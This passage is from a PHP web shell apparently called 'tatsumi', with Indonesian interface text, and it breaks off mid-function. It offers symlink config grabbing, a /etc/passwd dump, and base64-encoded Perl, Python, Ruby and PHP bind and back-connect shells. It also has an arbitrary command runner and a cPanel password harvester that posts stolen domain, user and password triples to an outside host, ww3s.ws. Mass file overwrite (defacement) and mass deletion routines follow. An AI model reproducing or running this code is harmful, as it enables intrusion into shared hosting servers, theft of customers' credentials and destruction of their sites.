  1121. fputs($file_config,$ambil_config);
  1122. }
  1123. }
  1124. if($_POST['config'] == 'symlink') {
  1125. @symlink($config,"tatsumi_Symconfig/".$user_tatsumi."-".$nama_config.".txt");
  1126. }
  1127. if($_POST['config'] == '404') {
  1128. $sym404=symlink($config,"tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt");
  1129. if($sym404){
  1130. @mkdir("tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404", 0777);
  1131. $htaccess="Options Indexes FollowSymLinks
  1132. DirectoryIndex tatsumi.htm
  1133. HeaderName tatsumi.txt
  1134. Satisfy Any
  1135. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1136. IndexIgnore *";
  1137.  
  1138. @file_put_contents("tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404/.htaccess",$htaccess);
  1139.  
  1140. @symlink($config,"tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404/tatsumi.txt");
  1141.  
  1142. }
  1143.  
  1144. }
  1145.  
  1146. }
  1147. } if($_POST['config'] == 'grab') {
  1148. echo "<center><a href='?path=$path/tatsumi_configgrab'><font color=lime>Done</font></a></center>";
  1149. }
  1150. if($_POST['config'] == '404') {
  1151. echo "<center>
  1152. <a href=\"tatsumi_sym404/root/\">SymlinkNya</a>
  1153. <br><a href=\"tatsumi_sym404/\">Configurations</a></center>";
  1154. }
  1155. if($_POST['config'] == 'symlink') {
  1156. echo "<center>
  1157. <a href=\"tatsumi_symconfig/root/\">Symlinknya</a>
  1158. <br><a href=\"tatsumi_symconfig/\">Configurations</a></center>";
  1159. }if($_POST['config'] == 'symvhost') {
  1160. echo "<center>
  1161. <a href=\"tatsumi_symvhost/root/\">Root Server</a>
  1162. <br><a href=\"tatsumi_symvhost/\">Configurations</a></center>";
  1163. }
  1164.  
  1165.  
  1166. }else{
  1167. echo "<form method=\"post\" action=\"\">
  1168. <center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1169. echo include("/etc/passwd");
  1170. echo "</textarea></center><br><br><center>
  1171. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
  1172. <option value=\"grab\">Config Grab</option>
  1173. <option value=\"symlink\">Symlink Config</option>
  1174. <option value=\"404\">Config 404</option>
  1175. <option value=\"symvhosts\">Vhosts Config Grabber</center></select><br></br>
  1176. <input type=\"submit\" value=\"GASS!!\"></td></tr></center>\n";
  1177. }
  1178. } elseif($_GET['jancok'] == 'jumping') {
  1179. $i = 0;
  1180. echo "<pre><div class='margin: 5px auto;'>";
  1181. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1182. while($passwd = fgets($etc)) {
  1183. if($passwd == '' || !$etc) {
  1184. echo "<font color=red>Can't read /etc/passwd</font>";
  1185. } else {
  1186. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1187. foreach($user_jumping[1] as $user_tatsumi_jump) {
  1188. $user_jumping_dir = "/home/$user_tatsumi_jump/public_html";
  1189. if(is_readable($user_jumping_dir)) {
  1190. $i++;
  1191. $jrw = "[<font color=white>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1192. if(is_writable($user_jumping_dir)) {
  1193. $jrw = "[<font color=white>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1194. }
  1195. echo $jrw;
  1196. if(function_exists('posix_getpwuid')) {
  1197. $domain_jump = file_get_contents("/etc/named.conf");
  1198. if($domain_jump == '') {
  1199. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1200. } else {
  1201. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1202. foreach($domains_jump[1] as $dj) {
  1203. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1204. $user_jumping_url = $user_jumping_url['name'];
  1205. if($user_jumping_url == $user_tatsumi_jump) {
  1206. echo " => ( <u>$dj</u> )<br>";
  1207. break;
  1208. }
  1209. }
  1210. }
  1211. } else {
  1212. echo "<br>";
  1213. }
  1214. }
  1215. }
  1216. }
  1217. }
  1218. if($i == 0) {
  1219. } else {
  1220. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1221. }
  1222. echo "</div></pre>";
  1223. } elseif($_GET['backconnect'] == 'tool'){
  1224. echo "<br><br><center><form method=post>
  1225. <br> <span>Bind port to /bin/sh [Perl]</span><br/>
  1226. Port: <input type='text' name='port' value='443'> <input type=submit name=bpl value='>>'>
  1227. <br><br>
  1228. <span>Back-connect</span><br/>
  1229. Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='443'><select class='select' name='backconnect' style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>
  1230. <input type=submit value='>>'>";
  1231. if($_POST['bpl']) {
  1232. $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  1233. $brt=@fopen('bp.pl','w');
  1234. fwrite($brt,$bp);
  1235. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1236. sleep(1);
  1237. echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1238. unlink("bp.pl");
  1239. }
  1240. if($_POST['backconnect'] == 'perl') {
  1241. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1242. $plbc=@fopen('bc.pl','w');
  1243. fwrite($plbc,$bc);
  1244. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1245. sleep(1);
  1246. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1247. unlink("bc.pl");
  1248. }
  1249. if($_POST['backconnect'] == 'python') {
  1250. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  1251. $pbcaa=@fopen('bcpyt.py','w');
  1252. fwrite($pbcaa,$becaa);
  1253. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1254. sleep(1);
  1255. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1256. unlink("bcpyt.py");
  1257. }
  1258. if($_POST['backconnect'] == 'ruby') {
  1259. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1260. $pbcaak=@fopen('bcruby.rb','w');
  1261. fwrite($pbcaak,$becaak);
  1262. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1263. sleep(1);
  1264. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1265. unlink("bcruby.rb");
  1266. }
  1267. if($_POST['backconnect'] == 'php') {
  1268. $ip = $_POST['server'];
  1269. $port = $_POST['port'];
  1270. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1271. if($errno != 0){
  1272. echo "<font color='red'>$errno : $errstr</font>";
  1273. } else if (!$sockfd) {
  1274. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1275. } else {
  1276. fputs ($sockfd ,"
  1277. \n{################################################################}
  1278. \n..:: BackConnect Php By tatsumi ::..
  1279. \n{################################################################}\n");
  1280. $dir = shell_exec("pwd");
  1281. $sysinfo = shell_exec("uname -a");
  1282. $time = Shell_exec("time");
  1283. $len = 1337;
  1284. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1285. while(!feof($sockfd)){ $cmdPrompt = '[tatsumi]#:> ';
  1286. fputs ($sockfd , $cmdPrompt );
  1287. $command= fgets($sockfd, $len);
  1288. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1289. }
  1290. fclose($sockfd);
  1291. }
  1292. }
  1293. echo "</p></div>";
  1294. } elseif($_GET['jancok'] == 'adminer') {
  1295. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1296. function adminer($url, $isi) {
  1297. $fp = fopen($isi, "w");
  1298. $ch = curl_init();
  1299. curl_setopt($ch, CURLOPT_URL, $url);
  1300. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1301. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1302. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1303. curl_setopt($ch, CURLOPT_FILE, $fp);
  1304. return curl_exec($ch);
  1305. curl_close($ch);
  1306. fclose($fp);
  1307. ob_flush();
  1308. flush();
  1309. }
  1310. if(file_exists('adminer.php')) {
  1311. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1312. } else {
  1313. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1314. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1315. } else {
  1316. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1317. }
  1318. }
  1319. } elseif($_GET['jancok'] == 'cmd') {
  1320. echo "<form method='post'><center></br>
  1321. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1322. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1323. </form><center>";
  1324. if($_POST['do_cmd']) {
  1325. echo "<pre>".exe($_POST['cmd'])."</pre>";
  1326. }
  1327. }
  1328. elseif($_GET['jancok'] == 'cpanel') {
  1329. @ini_set('display_errors',0);
  1330. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1331. $ar0=explode($marqueurDebutLien, $text);
  1332. $ar1=explode($marqueurFinLien, $ar0[$i]);
  1333. return trim($ar1[0]);
  1334. }
  1335. echo '<br><br><style>
  1336. textarea {
  1337. resize:none;
  1338. color:black;
  1339. background-color:#ffffff;
  1340. font-size:8pt; color:black;
  1341. border:1px solid white ;
  1342. border-left: 4px solid white ;
  1343. }
  1344. input {
  1345. color: black;
  1346. border:1px dotted white;
  1347. }
  1348. </style>';
  1349. echo '<center>';
  1350. $d0mains = @file('/etc/named.conf');
  1351. $domains = scandir("/var/named");
  1352. if ($domains or $d0mains)
  1353. {
  1354. $domains = scandir("/var/named");
  1355. if($domains) {
  1356. echo "<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
  1357. $count=1;
  1358. $dc = 0;
  1359. $list = scandir("/var/named");
  1360. foreach($list as $domain){
  1361. if(strpos($domain,".db")){
  1362. $domain = str_replace('.db','',$domain);
  1363. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1364. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1365. $path = getcwd();
  1366. if (is_readable($dirz)) {
  1367. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1368. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1369. $password=entre2v2($p,'password="','"');
  1370. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  1371. $dc++;
  1372. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  1373. $ch = curl_init();
  1374. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  1375. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  1376. curl_setopt($ch, CURLOPT_POST, 1);
  1377. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  1378. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1379. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1380. curl_setopt($ch, CURLOPT_HEADER, 1);
  1381. $buffer = curl_exec($ch);
  1382. }
  1383. }
  1384. }
  1385. echo '</table>';
  1386. $total = $dc;
  1387.  
  1388. echo '</center>';
  1389. }else{
  1390. $d0mains = @file('/etc/named.conf');
  1391. if($d0mains) {
  1392. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1393. $count=1;
  1394. $dc = 0;
  1395. $mck = array();
  1396. foreach($d0mains as $d0main){
  1397. if(@eregi('zone',$d0main)){
  1398. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1399. flush();
  1400. if(strlen(trim($domain[1][0])) >2){
  1401. $mck[] = $domain[1][0];
  1402. }
  1403. }
  1404. }
  1405. $mck = array_unique($mck);
  1406. $usr = array();
  1407. $dmn = array();
  1408. foreach($mck as $o) {
  1409. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1410. $usr[] = $infos['name'];
  1411. $dmn[] = $o;
  1412. }
  1413. array_multisort($usr,$dmn);
  1414. $dt = file('/etc/passwd');
  1415. $passwd = array();
  1416. foreach($dt as $d) {
  1417. $r = explode(':',$d);
  1418. if(strpos($r[5],'home')) {
  1419. $passwd[$r[0]] = $r[5];
  1420. }
  1421. }
  1422. $l=0;
  1423. $j=1;
  1424. foreach($usr as $r) {
  1425. $dirz = '/home/'.$r.'/.my.cnf';
  1426. $path = getcwd();
  1427. if (is_readable($dirz)) {
  1428. copy($dirz, ''.$path.'/'.$r.'.txt');
  1429. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1430. $password=entre2v2($p,'password="','"');
  1431. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1432. $dc++;
  1433. flush();
  1434. $l=$l?0:1;
  1435. $j++;
  1436. }
  1437. }
  1438. }
  1439. echo '</table>';
  1440. $total = $dc;
  1441. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  1442. echo '</center>';
  1443. }
  1444.  
  1445. }else{
  1446. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  1447. }
  1448. } elseif($_GET['jancok'] == 'mass') {
  1449. echo "<center><form action=\"\" method=\"post\">\n";
  1450. $dirr=$_POST['d_dir'];
  1451. $index = $_POST["script"];
  1452. $index = str_replace('"',"'",$index);
  1453. $index = stripslashes($index);
  1454. function edit_file($file,$index){
  1455. if (is_writable($file)) {
  1456. clear_fill($file,$index);
  1457. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1458. }
  1459. else {
  1460. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1461. }
  1462. }
  1463. function hapus_massal($dir,$namafile) {
  1464. if(is_writable($dir)) {
  1465. $dira = scandir($dir);
  1466. foreach($dira as $dirb) {
  1467. $dirc = "$dir/$dirb";
  1468. $lokasi = $dirc.'/'.$namafile;
  1469. if($dirb === '.') {
  1470. if(file_exists("$dir/$namafile")) {
  1471. unlink("$dir/$namafile");
  1472. }
  1473. } elseif($dirb === '..') {
  1474. if(file_exists("".dirname($dir)."/$namafile")) {
  1475. unlink("".dirname($dir)."/$namafile");
  1476. }
  1477. } else {
  1478. if(is_dir($dirc)) {
  1479. if(is_writable($dirc)) {
  1480. if(file_exists($lokasi)) {
  1481. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1482. unlink($lokasi);
  1483. $idx = hapus_massal($dirc,$namafile);
  1484. }
  1485. }
  1486. }
  1487. }
  1488. }
  1489. }
  1490. }
  1491. function clear_fill($file,$index){
  1492. if(file_exists($file)){
  1493. $handle = fopen($file,'w');
  1494. fwrite($handle,'');
  1495. fwrite($handle,$index);
  1496. fclose($handle); } }
  1497.  
  1498. function gass(){
  1499. global $dirr , $index ;
  1500. chdir($dirr);
  1501. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1502. $files = scandir($dirr) ;
  1503. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1504. sort($files);
  1505. $n = 0 ;
  1506. foreach ($files as $file){
  1507. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1508. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1509. edit_file($file,$index);
  1510. flush();
  1511. $n = $n +1 ;
  1512. }
  1513. }
  1514. echo "<br>";
  1515. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  1516. }
  1517. function ListFiles($dirrall) {
  1518.  
  1519. if($dh = opendir($dirrall)) {
  1520.  
  1521. $files = Array();
  1522. $inner_files = Array();
  1523. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1524. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1525. while($file = readdir($dh)) {
